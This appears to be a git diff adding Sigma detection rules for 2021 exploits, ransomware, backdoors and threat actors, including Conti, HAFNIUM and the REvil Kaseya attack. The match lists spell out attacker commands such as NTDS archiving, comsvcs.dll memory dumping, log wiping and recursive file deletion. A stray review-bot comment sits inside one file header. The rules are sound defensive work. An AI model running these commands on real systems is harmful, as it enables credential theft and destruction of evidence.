+modified: 2023/02/04
+tags:
+ - attack.privilege_escalation
+ - attack.t1068
+ - detection.emerging_threats
+logsource:
+ category: process_creation
+ product: windows
+detection:
+ process_creation:
+ EventID: 4688
+ Channel: Security
+ selection:
+ CommandLine|contains:
+ - printnightmare.gentilkiwi.com
+ - ' /user:gentilguest '
+ - Kiwi Legit Printer
+ condition: process_creation and selection
+falsepositives:
+ - Unknown
+level: critical
+ruletype: Sigma
diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2021/Exploits/registry_set_cve_2021_31979_cve_2021_33771_exploits.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2021/Exploits/registry_set_cve_2021_31979_cve_2021_33771_exploits.yml
new file mode 100644
index 000000000..2fbf20afa
--- /dev/null
+++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2021/Exploits/registry_set_cve_2021_31979_cve_2021_33771_exploits.yml
@@ -0,0 +1,38 @@
+title: CVE-2021-31979 CVE-2021-33771 Exploits
+id: 32b5db62-cb5f-4266-9639-0fa48376ac00
+status: experimental
+description: Detects patterns as noticed in exploitation of Windows CVE-2021-31979 CVE-2021-33771 vulnerability and DevilsTongue malware by threat group Sourgum
+references:
+ - https://www.microsoft.com/security/blog/2021/07/15/protecting-customers-from-a-private-sector-offensive-actor-using-0-day-exploits-and-devilstongue-malware/
+ - https://citizenlab.ca/2021/07/hooking-candiru-another-mercenary-spyware-vendor-comes-into-focus/
+author: Sittikorn S, frack113
+date: 2021/07/16
+modified: 2023/08/17
+tags:
+ - attack.credential_access
+ - attack.t1566
+ - attack.t1203
+ - cve.2021.33771
+ - cve.2021.31979
+ - detection.emerging_threats
+ # - threat_group.Sourgum
+logsource:
+ product: windows
+ category: registry_set
+detection:
+ registry_set:
+ EventID: 4657
+ Channel: Security
+ selection:
+ ObjectName|endswith:
+ - CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32\(Default)
+ - CLSID\{7C857801-7381-11CF-884D-00AA004B2E24}\InProcServer32\(Default)
+ filter:
+ NewValue|endswith:
+ - system32\wbem\wmiutils.dll
+ - system32\wbem\wbemsvc.dll
+ condition: registry_set and (selection and not filter)
+falsepositives:
+ - Unlikely
+level: critical
+ruletype: Sigma
diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2021/Exploits/win_exchange_cve_2021_42321.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2021/Exploits/win_exchange_cve_2021_42321.yml
new file mode 100644
index 000000000..b852c739f
--- /dev/null
+++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2021/Exploits/win_exchange_cve_2021_42321.yml
@@ -0,0 +1,32 @@
+title: Possible Exploitation of Exchange RCE CVE-2021-42321
+id: c92f1896-d1d2-43c3-92d5-7a5b35c217bb
+status: test
+description: Detects log entries that appear in exploitation attempts against MS Exchange RCE CVE-2021-42321
+references:
+ - https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-42321
+author: Florian Roth (Nextron Systems), @testanull
+date: 2021/11/18
+modified: 2022/07/12
+tags:
+ - attack.lateral_movement
+ - attack.t1210
+ - detection.emerging_threats
+logsource:
+ product: windows
+ service: msexchange-management
+ # warning: The 'data' field used in the detection section is the container for the event data as a whole. You may have to adapt the rule for your backend accordingly
+detection:
+ msexchange_management:
+ Channel: MSExchange Management
+ selection:
+ EventID:
+ - 6
+ - 8
+ Data|contains:
+ - 'Cmdlet failed. Cmdlet Get-App, '
+ - 'Task Get-App throwing unhandled exception: System.InvalidCastException:'
+ condition: msexchange_management and selection
+falsepositives:
+ - Unknown, please report false positives via https://github.com/SigmaHQ/sigma/issues
+level: high
+ruletype: Sigma
diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2021/Malware/BlackByte/proc_creation_win_malware_blackbyte_ransomware.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2021/Malware/BlackByte/proc_creation_win_malware_blackbyte_ransomware.yml
new file mode 100644
index 000000000..8e07648bc
--- /dev/null
+++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2021/Malware/BlackByte/proc_creation_win_malware_blackbyte_ransomware.yml
@@ -0,0 +1,39 @@
+title: Potential BlackByte Ransomware Activity
+id: 999e8307-a775-4d5f-addc-4855632335be
+status: test
+description: Detects command line patterns used by BlackByte ransomware in different operations
+references:
+ - https://redcanary.com/blog/blackbyte-ransomware/
+author: Florian Roth (Nextron Systems)
+date: 2022/02/25
+modified: 2023/02/08
+tags:
+ - detection.emerging_threats
+ - attack.execution
+ - attack.defense_evasion
+ - attack.impact
+ - attack.t1485
+ - attack.t1498
+ - attack.t1059.001
+ - attack.t1140
+logsource:
+ category: process_creation
+ product: windows
+detection:
+ process_creation:
+ EventID: 4688
+ Channel: Security
+ selection_1:
+ CommandLine|contains: ' -single '
+ NewProcessName|startswith: C:\Users\Public\
+ selection_2:
+ CommandLine|contains:
+ - del C:\Windows\System32\Taskmgr.exe
+ - ;Set-Service -StartupType Disabled $
+ - powershell -command "$x =[System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String(
+ - ' do start wordpad.exe /p '
+ condition: process_creation and (1 of selection_*)
+falsepositives:
+ - Unknown
+level: high
+ruletype: Sigma
diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2021/Malware/Conti/proc_creation_win_malware_conti.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2021/Malware/Conti/proc_creation_win_malware_conti.yml
new file mode 100644
index 000000000..a1cee1e23
--- /dev/null
+++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2021/Malware/Conti/proc_creation_win_malware_conti.yml
@@ -0,0 +1,33 @@
+title: Conti Volume Shadow Listing
+id: 7b30e0a7-c675-4b24-8a46-82fa67e2433d
+status: test
+description: Detects a command used by conti to find volume shadow backups
+references:
+ - https://twitter.com/vxunderground/status/1423336151860002816?s=20
+ - https://www.virustotal.com/gui/file/03e9b8c2e86d6db450e5eceec057d7e369ee2389b9daecaf06331a95410aa5f8/detection
+author: Max Altgelt (Nextron Systems), Tobias Michalski (Nextron Systems)
+date: 2021/08/09
+tags:
+ - attack.t1587.001
+ - attack.resource_development
+ - detection.emerging_threats
+logsource:
+ category: process_creation
+ product: windows
+detection:
+ process_creation:
+ EventID: 4688
+ Channel: Security
+ selection:
+ CommandLine|contains|all:
+ - vssadmin list shadows
+ - log.txt
+ condition: process_creation and selection
+fields:
+ - SubjectUserName
+ - ParentProcessName
+ - CommandLine
+falsepositives:
+ - Unknown
+level: high
+ruletype: Sigma
diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2021/Malware/Conti/proc_creation_win_malware_conti_7zip.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2021/Malware/Conti/proc_creation_win_malware_conti_7zip.yml
new file mode 100644
index 000000000..96ab7caba
--- /dev/null
+++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2021/Malware/Conti/proc_creation_win_malware_conti_7zip.yml
@@ -0,0 +1,30 @@
+title: Conti NTDS Exfiltration Command
+id: aa92fd02-09f2-48b0-8a93-864813fb8f41
+status: test
+description: Detects a command used by conti to exfiltrate NTDS
+references:
+ - https://twitter.com/vxunderground/status/1423336151860002816?s=20
+ - https://www.virustotal.com/gui/file/03e9b8c2e86d6db450e5eceec057d7e369ee2389b9daecaf06331a95410aa5f8/detection
+author: Max Altgelt (Nextron Systems), Tobias Michalski (Nextron Systems)
+date: 2021/08/09
+modified: 2022/10/09
+tags:
+ - attack.collection
+ - attack.t1560
+ - detection.emerging_threats
+logsource:
+ category: process_creation
+ product: windows
+detection:
+ process_creation:
+ EventID: 4688
+ Channel: Security
+ selection:
+ CommandLine|contains|all:
+ - 7za.exe
+ - \\C$\\temp\\log.zip
+ condition: process_creation and selection
+falsepositives:
+ - Unknown
+level: high
+ruletype: Sigma
diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2021/Malware/Conti/proc_creation_win_malware_conti_ransomware_commands.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2021/Malware/Conti/proc_creation_win_malware_conti_ransomware_commands.yml
new file mode 100644
index 000000000..dbb15619a
--- /dev/null
+++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2021/Malware/Conti/proc_creation_win_malware_conti_ransomware_commands.yml
@@ -0,0 +1,35 @@
+title: Potential Conti Ransomware Activity
+id: 689308fc-cfba-4f72-9897-796c1dc61487
+status: test
+description: Detects a specific command used by the Conti ransomware group
+references:
+ - https://news.sophos.com/en-us/2021/09/03/conti-affiliates-use-proxyshell-exchange-exploit-in-ransomware-attacks/
+ - https://twitter.com/VK_Intel/status/1447795359900704769?t=Xz7vaLTvaaCZ5kHoZa6gMw&s=19
+author: frack113
+date: 2021/10/12
+modified: 2023/02/13
+tags:
+ - attack.impact
+ - attack.s0575
+ - attack.t1486
+ - detection.emerging_threats
+logsource:
+ category: process_creation
+ product: windows
+detection:
+ process_creation:
+ EventID: 4688
+ Channel: Security
+ selection:
+ CommandLine|contains|all:
+ - '-m '
+ - '-net '
+ - '-size ' # Size 10 in references
+ - '-nomutex '
+ - -p \\\\
+ - $
+ condition: process_creation and selection
+falsepositives:
+ - Unlikely
+level: critical
+ruletype: Sigma
diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2021/Malware/Conti/proc_creation_win_malware_conti_ransomware_database_dump.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2021/Malware/Conti/proc_creation_win_malware_conti_ransomware_database_dump.yml
new file mode 100644
index 000000000..3f3b4fccc
--- /dev/null
+++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2021/Malware/Conti/proc_creation_win_malware_conti_ransomware_database_dump.yml
@@ -0,0 +1,39 @@
+title: Potential Conti Ransomware Database Dumping Activity Via SQLCmd
+id: 2f47f1fd-0901-466e-a770-3b7092834a1b
+status: test
+description: Detects a command used by conti to dump database
+references:
+ - https://twitter.com/vxunderground/status/1423336151860002816?s=20 # The leak info not the files itself
+ - https://www.virustotal.com/gui/file/03e9b8c2e86d6db450e5eceec057d7e369ee2389b9daecaf06331a95410aa5f8/detection
+ - https://docs.microsoft.com/en-us/sql/tools/sqlcmd-utility?view=sql-server-ver15
+author: frack113
+date: 2021/08/16
+modified: 2023/05/04
+tags:
+ - attack.collection
+ - attack.t1005
+ - detection.emerging_threats
+logsource:
+ category: process_creation
+ product: windows
+detection:
+ process_creation:
+ EventID: 4688
+ Channel: Security
+ selection_tools:
+ - NewProcessName|endswith: \sqlcmd.exe
+ - CommandLine|contains:
+ - 'sqlcmd '
+ - sqlcmd.exe
+ selection_svr:
+ CommandLine|contains: ' -S localhost '
+ selection_query:
+ CommandLine|contains:
+ - sys.sysprocesses
+ - master.dbo.sysdatabases
+ - BACKUP DATABASE
+ condition: process_creation and (all of selection_*)
+falsepositives:
+ - Unknown
+level: high
+ruletype: Sigma
diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2021/Malware/DarkSide/proc_creation_win_malware_darkside_ransomware.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2021/Malware/DarkSide/proc_creation_win_malware_darkside_ransomware.yml
new file mode 100644
index 000000000..ca667dbe3
--- /dev/null
+++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2021/Malware/DarkSide/proc_creation_win_malware_darkside_ransomware.yml
@@ -0,0 +1,34 @@ +title: DarkSide Ransomware Pattern +id: 965fff6c-1d7e-4e25-91fd-cdccd75f7d2c +status: test +description: Detects DarkSide Ransomware and helpers +references: + - https://www.fireeye.com/blog/threat-research/2021/05/shining-a-light-on-darkside-ransomware-operations.html + - https://app.any.run/tasks/8b9a571b-bcc1-4783-ba32-df4ba623b9c0/ + - https://www.joesandbox.com/analysis/411752/0/html#7048BB9A06B8F2DD9D24C77F389D7B2B58D2 +author: Florian Roth (Nextron Systems) +date: 2021/05/14 +tags: + - attack.execution + - attack.t1204 + - detection.emerging_threats +logsource: + category: process_creation + product: windows +detection: + process_creation: + EventID: 4688 + Channel: Security + selection1: + CommandLine|contains: + - =[char][byte]('0x'+ + - ' -work worker0 -path ' + selection2: + ParentCommandLine|contains: DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7} + NewProcessName|contains: \AppData\Local\Temp\ + condition: process_creation and (1 of selection*) +falsepositives: + - Unknown + - UAC bypass method used by other malware +level: critical +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2021/Malware/Devil-Bait/proc_creation_win_malware_devil_bait_output_redirect.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2021/Malware/Devil-Bait/proc_creation_win_malware_devil_bait_output_redirect.yml new file mode 100644 index 000000000..0b71d9f68 --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2021/Malware/Devil-Bait/proc_creation_win_malware_devil_bait_output_redirect.yml 
@@ -0,0 +1,43 @@
+title: Potential Devil Bait Malware Reconnaissance
+id: e8954be4-b2b8-4961-be18-da1a5bda709c
+related:
+ - id: 8e0bb260-d4b2-4fff-bb8d-3f82118e6892
+ type: derived
+status: experimental
+description: Detects specific process behavior observed with Devil Bait samples
+references:
+ - https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/devil-bait/NCSC-MAR-Devil-Bait.pdf
+ - https://www.virustotal.com/gui/file/fa71eee906a7849ba3f4bab74edb577bd1f1f8397ca428591b4a9872ce1f1e9b/behavior
+author: Nasreddine Bencherchali (Nextron Systems), NCSC (Idea)
+date: 2023/05/15
+tags:
+ - attack.execution
+ - attack.t1218
+ - detection.emerging_threats
+logsource:
+ category: process_creation
+ product: windows
+detection:
+ process_creation:
+ EventID: 4688
+ Channel: Security
+ selection_redirect:
+ CommandLine|contains: '>>%APPDATA%\Microsoft\'
+ CommandLine|endswith:
+ - .xml
+ - .txt
+ ParentProcessName|endswith: \wscript.exe
+ NewProcessName|endswith: \cmd.exe
+ selection_recon_cmd:
+ CommandLine|contains:
+ # Taken from a6f9043627f8be2452153b5dbf6278e9b91763c3b5c2aea537a859e0c8c6b504
+ # If you find samples using other commands please add them
+ - dir
+ - ipconfig /all
+ - systeminfo
+ - tasklist
+ condition: process_creation and (all of selection_*)
+falsepositives:
+ - Unlikely
+level: high
+ruletype: Sigma
diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2021/Malware/Goofy-Guineapig/proc_creation_win_malware_goofy_guineapig_broken_cmd.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2021/Malware/Goofy-Guineapig/proc_creation_win_malware_goofy_guineapig_broken_cmd.yml
new file mode 100644
index 000000000..b6dea421d
--- /dev/null
+++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2021/Malware/Goofy-Guineapig/proc_creation_win_malware_goofy_guineapig_broken_cmd.yml
@@ -0,0 +1,25 @@
+title: Potential Goofy Guineapig Backdoor Activity
+id: 477a5ed3-a374-4282-9f3b-ed94e159a108
+status: experimental
+description: Detects a specific broken command that was used by Goofy-Guineapig as described by the NCSC report.
+references:
+ - https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/goofy-guineapig/NCSC-MAR-Goofy-Guineapig.pdf
+author: X__Junior (Nextron Systems)
+date: 2023/05/14
+tags:
+ - attack.execution
+ - detection.emerging_threats
+logsource:
+ category: process_creation
+ product: windows
+detection:
+ process_creation:
+ EventID: 4688
+ Channel: Security
+ selection:
+ CommandLine|contains: choice /t %d /d y /n >nul
+ condition: process_creation and selection
+falsepositives:
+ - Unlikely
+level: high
+ruletype: Sigma
diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2021/Malware/Goofy-Guineapig/proc_creation_win_malware_goofy_guineapig_googleupdate_uncommon_child_instance.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2021/Malware/Goofy-Guineapig/proc_creation_win_malware_goofy_guineapig_googleupdate_uncommon_child_instance.yml
new file mode 100644
index 000000000..df83e5aee
--- /dev/null
+++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2021/Malware/Goofy-Guineapig/proc_creation_win_malware_goofy_guineapig_googleupdate_uncommon_child_instance.yml
@@ -0,0 +1,31 @@
+title: Potential Goofy Guineapig GoolgeUpdate Process Anomaly
+id: bdbab15a-3826-48fa-a1b7-723cd8f32fcc
+status: experimental
+description: Detects "GoogleUpdate.exe" spawning a new instance of itself in an uncommon location as seen used by the Goofy Guineapig backdoor
+references:
+ - https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/goofy-guineapig/NCSC-MAR-Goofy-Guineapig.pdf
+author: X__Junior (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
+date: 2023/05/15
+tags:
+ - attack.defense_evasion
+ - detection.emerging_threats
+logsource:
+ category: process_creation
+ product: windows
+detection:
+ process_creation:
+ EventID: 4688
+ Channel: Security
+ selection:
+ ParentProcessName|endswith: \GoogleUpdate.exe
+ NewProcessName|endswith: \GoogleUpdate.exe
+ filter_main_legit_paths:
+ - NewProcessName|startswith:
+ - C:\Program Files\Google\
+ - C:\Program Files (x86)\Google\
+ - NewProcessName|contains: \AppData\Local\Google\Update\
+ condition: process_creation and (selection and not 1 of filter_main_*)
+falsepositives:
+ - Unknown
+level: high
+ruletype: Sigma
diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2021/Malware/Goofy-Guineapig/win_system_malware_goofy_guineapig_service_persistence.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2021/Malware/Goofy-Guineapig/win_system_malware_goofy_guineapig_service_persistence.yml
new file mode 100644
index 000000000..f5b1c2c52
--- /dev/null
+++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2021/Malware/Goofy-Guineapig/win_system_malware_goofy_guineapig_service_persistence.yml
@@ -0,0 +1,30 @@
+title: Goofy Guineapig Backdoor Service Creation
+id: 8c15dd74-9570-4f48-80b2-29996fd91ee6
+status: experimental
+description: Detects service creation persistence used by the Goofy Guineapig backdoor
+references:
+ - https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/goofy-guineapig/NCSC-MAR-Goofy-Guineapig.pdf
+author: Nasreddine Bencherchali (Nextron Systems)
+date: 2023/05/15
+tags:
+ - attack.persistence
+ - detection.emerging_threats
+logsource:
+ product: windows
+ service: system
+detection:
+ system:
+ Channel: System
+ selection:
+ Provider_Name: Service Control Manager
+ EventID: 7045
+ ServiceName: GoogleUpdate
+ ImagePath|contains|all:
+ - rundll32
+ - FileProtocolHandler
+ - \ProgramData\GoogleUpdate\GoogleUpdate.exe
+ condition: system and selection
+falsepositives:
+ - Unlikely
+level: critical
+ruletype: Sigma
diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2021/Malware/Pingback/proc_creation_win_malware_pingback_backdoor.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2021/Malware/Pingback/proc_creation_win_malware_pingback_backdoor.yml
new file mode 100644
index 000000000..7d204765c
--- /dev/null
+++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2021/Malware/Pingback/proc_creation_win_malware_pingback_backdoor.yml
@@ -0,0 +1,38 @@
+title: Pingback Backdoor Activity
+id: b2400ffb-7680-47c0-b08a-098a7de7e7a9
+related:
+ - id: 35a7dc42-bc6f-46e0-9f83-81f8e56c8d4b # DLL Load
+ type: similar
+ - id: 2bd63d53-84d4-4210-80ff-bf0658f1bf78 # File Indicators
+ type: similar
+status: test
+description: Detects the use of Pingback backdoor that creates ICMP tunnel for C2 as described in the trustwave report
+references:
+ - https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/backdoor-at-the-end-of-the-icmp-tunnel
+ - https://app.any.run/tasks/4a54c651-b70b-4b72-84d7-f34d301d6406
+author: Bhabesh Raj
+date: 2021/05/05
+modified: 2023/02/17
+tags:
+ - attack.persistence
+ - attack.t1574.001
+ - detection.emerging_threats
+logsource:
+ product: windows
+ category: process_creation
+detection:
+ process_creation:
+ EventID: 4688
+ Channel: Security
+ selection:
+ CommandLine|contains|all:
+ - config
+ - msdtc
+ - start
+ - auto
+ ParentProcessName|endswith: \updata.exe
+ condition: process_creation and selection
+falsepositives:
+ - Unlikely
+level: high
+ruletype: Sigma
diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2021/Malware/Small-Sieve/proc_creation_win_malware_small_sieve_cli_arg.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2021/Malware/Small-Sieve/proc_creation_win_malware_small_sieve_cli_arg.yml
new file mode 100644
index 000000000..bbd432ddf
--- /dev/null
+++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2021/Malware/Small-Sieve/proc_creation_win_malware_small_sieve_cli_arg.yml
@@ -0,0 +1,26 @@
+title: Small Sieve Malware CommandLine Indicator
+id: 21117127-21c8-437a-ae03-4b51e5a8a088
+status: test
+description: Detects specific command line argument being passed to a binary as seen being used by the malware Small Sieve.
+references:
+ - https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/small-sieve/NCSC-MAR-Small-Sieve.pdf
+author: Nasreddine Bencherchali (Nextron Systems)
+date: 2023/05/19
+tags:
+ - attack.persistence
+ - attack.t1574.001
+ - detection.emerging_threats
+logsource:
+ product: windows
+ category: process_creation
+detection:
+ process_creation:
+ EventID: 4688
+ Channel: Security
+ selection:
+ CommandLine|endswith: .exe Platypus
+ condition: process_creation and selection
+falsepositives:
+ - Unlikely
+level: high
+ruletype: Sigma
diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2021/Malware/Small-Sieve/registry_set_malware_small_sieve_evasion_typo.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2021/Malware/Small-Sieve/registry_set_malware_small_sieve_evasion_typo.yml
new file mode 100644
index 000000000..8435c429c
--- /dev/null
+++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2021/Malware/Small-Sieve/registry_set_malware_small_sieve_evasion_typo.yml
@@ -0,0 +1,29 @@
+title: Small Sieve Malware Registry Persistence
+id: 65c6e3c1-fb28-4c03-a51e-84919d8185f1
+status: experimental
+description: Detects registry value with specific intentional typo and strings seen used by the Small Sieve malware
+references:
+ - https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/small-sieve/NCSC-MAR-Small-Sieve.pdf
+author: Nasreddine Bencherchali (Nextron Systems)
+date: 2023/05/19
+modified: 2023/08/17
+tags:
+ - attack.persistence
+ - detection.emerging_threats
+logsource:
+ category: registry_set
+ product: windows
+detection:
+ registry_set:
+ EventID: 4657
+ Channel: Security
+ selection_path:
+ ObjectName|contains: \Microsoft\Windows\CurrentVersion\Run\
+ selection_value:
+ - ObjectName|contains: Microsift
+ - NewValue|contains: .exe Platypus
+ condition: registry_set and (all of selection_*)
+falsepositives:
+ - Unlikely
+level: high
+ruletype: Sigma
diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2021/TA/HAFNIUM/proc_creation_win_apt_hafnium.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2021/TA/HAFNIUM/proc_creation_win_apt_hafnium.yml
new file mode 100644
index 000000000..f01a1996e
--- /dev/null
+++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2021/TA/HAFNIUM/proc_creation_win_apt_hafnium.yml
@@ -0,0 +1,81 @@
+title: HAFNIUM Exchange Exploitation Activity
+id: bbb2dedd-a0e3-46ab-ba6c-6c82ae7a9aa7
+status: test
+description: Detects activity observed by different researchers to be HAFNIUM group activity (or related) on Exchange servers
+references:
+ - https://blog.truesec.com/2021/03/07/exchange-zero-day-proxylogon-and-hafnium/
+ - https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/
+ - https://discuss.elastic.co/t/detection-and-response-for-hafnium-activity/266289/3
+ - https://twitter.com/GadixCRK/status/1369313704869834753?s=20
+ - https://twitter.com/BleepinComputer/status/1372218235949617161
+author: Florian Roth (Nextron Systems)
+date: 2021/03/09
+modified: 2023/03/09
+tags:
+ - attack.persistence
+ - attack.t1546
+ - attack.t1053
+ - attack.g0125
+ - detection.emerging_threats
+logsource:
+ category: process_creation
+ product: windows
+detection:
+ process_creation:
+ EventID: 4688
+ Channel: Security
+ selection_attrib:
+ CommandLine|contains|all:
+ - attrib
+ - ' +h '
+ - ' +s '
+ - ' +r '
+ - .aspx
+ selection_vsperfmon:
+ - NewProcessName|contains: \ProgramData\VSPerfMon\
+ - CommandLine|contains|all:
+ - schtasks
+ - VSPerfMon
+ selection_opera_1:
+ NewProcessName|endswith: Opera_browser.exe
+ ParentProcessName|endswith:
+ - \services.exe
+ - \svchost.exe
+ selection_opera_2:
+ NewProcessName|endswith: Users\Public\opera\Opera_browser.exe
+ selection_vssadmin:
+ CommandLine|contains|all:
+ - vssadmin list shadows
+ - Temp\__output
+ selection_makecab_1:
+ CommandLine|contains|all:
+ - inetpub\wwwroot\
+ - .dmp.zip
+ NewProcessName|endswith: \makecab.exe
+ selection_makecab_2:
+ CommandLine|contains:
+ - Microsoft\Exchange Server\
+ - compressionmemory
+ - .gif
+ NewProcessName|endswith: \makecab.exe
+ selection_7zip:
+ CommandLine|contains|all:
+ - ' -t7z '
+ - C:\Programdata\pst
+ - \it.zip
+ selection_rundll32:
+ CommandLine|contains|all:
+ - \comsvcs.dll
+ - Minidump
+ - 'full '
+ - \inetpub\wwwroot
+ 
selection_other:
+ CommandLine|contains:
+ - Windows\Temp\xx.bat
+ - Windows\WwanSvcdcs
+ - Windows\Temp\cw.exe
+ condition: process_creation and (1 of selection*)
+falsepositives:
+ - Unlikely
+level: critical
+ruletype: Sigma
diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2021/TA/Kaseya-Supply-Chain/proc_creation_win_apt_revil_kaseya.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2021/TA/Kaseya-Supply-Chain/proc_creation_win_apt_revil_kaseya.yml
new file mode 100644
index 000000000..7ff674180
--- /dev/null
+++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2021/TA/Kaseya-Supply-Chain/proc_creation_win_apt_revil_kaseya.yml
@@ -0,0 +1,50 @@
+title: REvil Kaseya Incident Malware Patterns
+id: 5de632bc-7fbd-4c8a-944a-fce55c59eae5
+status: test
+description: Detects process command line patterns and locations used by REvil group in Kaseya incident (can also match on other malware)
+references:
+ - https://community.sophos.com/b/security-blog/posts/active-ransomware-attack-on-kaseya-customers
+ - https://www.joesandbox.com/analysis/443736/0/html
+ - https://doublepulsar.com/kaseya-supply-chain-attack-delivers-mass-ransomware-event-to-us-companies-76e4ec6ec64b
+ - https://therecord.media/revil-ransomware-executes-supply-chain-attack-via-malicious-kaseya-update/
+ - https://blog.truesec.com/2021/07/04/kaseya-supply-chain-attack-targeting-msps-to-deliver-revil-ransomware/
+author: Florian Roth (Nextron Systems)
+date: 2021/07/03
+modified: 2022/05/20
+tags:
+ - attack.execution
+ - attack.t1059
+ - attack.g0115
+ - detection.emerging_threats
+logsource:
+ category: process_creation
+ product: windows
+detection:
+ process_creation:
+ EventID: 4688
+ Channel: Security
+ selection1:
+ CommandLine|contains:
+ - C:\Windows\cert.exe
+ - del /q /f c:\kworking\agent.crt
+ - Kaseya VSA Agent Hot-fix
+ - \AppData\Local\Temp\MsMpEng.exe
+ - rmdir /s /q %SystemDrive%\inetpub\logs
+ - del /s /q /f %SystemDrive%\\*.log
+ - c:\kworking1\agent.exe
+ - c:\kworking1\agent.crt
+ selection2:
+ NewProcessName:
+ - C:\Windows\MsMpEng.exe
+ - C:\Windows\cert.exe
+ - C:\kworking\agent.exe
+ - C:\kworking1\agent.exe
+ selection3:
+ CommandLine|contains|all:
+ - del /s /q /f
+ - WebPages\Errors\webErrorLog.txt
+ condition: process_creation and (1 of selection*)
+falsepositives:
+ - Unknown
+level: critical
+ruletype: Sigma
diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2021/TA/SOURGUM/proc_creation_win_apt_sourgrum.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2021/TA/SOURGUM/proc_creation_win_apt_sourgrum.yml
new file mode 100644
index 000000000..13615cfa6
--- /dev/null
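Review bot: The `rmdir /s /q %SystemDrive%\inetpub\logs`, `del /s /q /f %SystemDrive%\\*.log` and `selection3` (`WebPages\Errors\webErrorLog.txt`) patterns are log wiping, yet the rule is tagged only `attack.execution`/`attack.t1059`; adding `attack.defense_evasion` and `attack.t1070.004` would let these hits also surface under indicator removal. A short comment on `selection2` would help triage, e.g. `# MsMpEng.exe dropped into C:\Windows\ (not the Defender platform folder) plus the agent/cert drops under kworking`, since a reader seeing `C:\Windows\MsMpEng.exe` may otherwise assume the Defender engine belongs there. I can't tell from this file how the converter treats the `\\*` escape in `%SystemDrive%\\*.log` — worth verifying it still reads as a literal backslash followed by a wildcard after conversion.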
+++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2021/TA/SOURGUM/proc_creation_win_apt_sourgrum.yml
@@ -0,0 +1,44 @@
+title: SOURGUM Actor Behaviours
+id: 7ba08e95-1e0b-40cd-9db5-b980555e42fd
+status: test
+description: Suspicious behaviours related to an actor tracked by Microsoft as SOURGUM
+references:
+ - https://www.virustotal.com/gui/file/c299063e3eae8ddc15839767e83b9808fd43418dc5a1af7e4f44b97ba53fbd3d/detection
+ - https://github.com/Azure/Azure-Sentinel/blob/43e9be273dca321295190bfc4902858e009d4a35/Detections/MultipleDataSources/SOURGUM_IOC.yaml
+ - https://www.microsoft.com/security/blog/2021/07/15/protecting-customers-from-a-private-sector-offensive-actor-using-0-day-exploits-and-devilstongue-malware/
+author: MSTIC, FPT.EagleEye
+date: 2021/06/15
+modified: 2022/10/09
+tags:
+ - attack.t1546
+ - attack.t1546.015
+ - attack.persistence
+ - attack.privilege_escalation
+ - detection.emerging_threats
+logsource:
+ product: windows
+ category: process_creation
+detection:
+ process_creation:
+ EventID: 4688
+ Channel: Security
+ selection:
+ NewProcessName|contains:
+ - windows\system32\Physmem.sys
+ - Windows\system32\ime\SHARED\WimBootConfigurations.ini
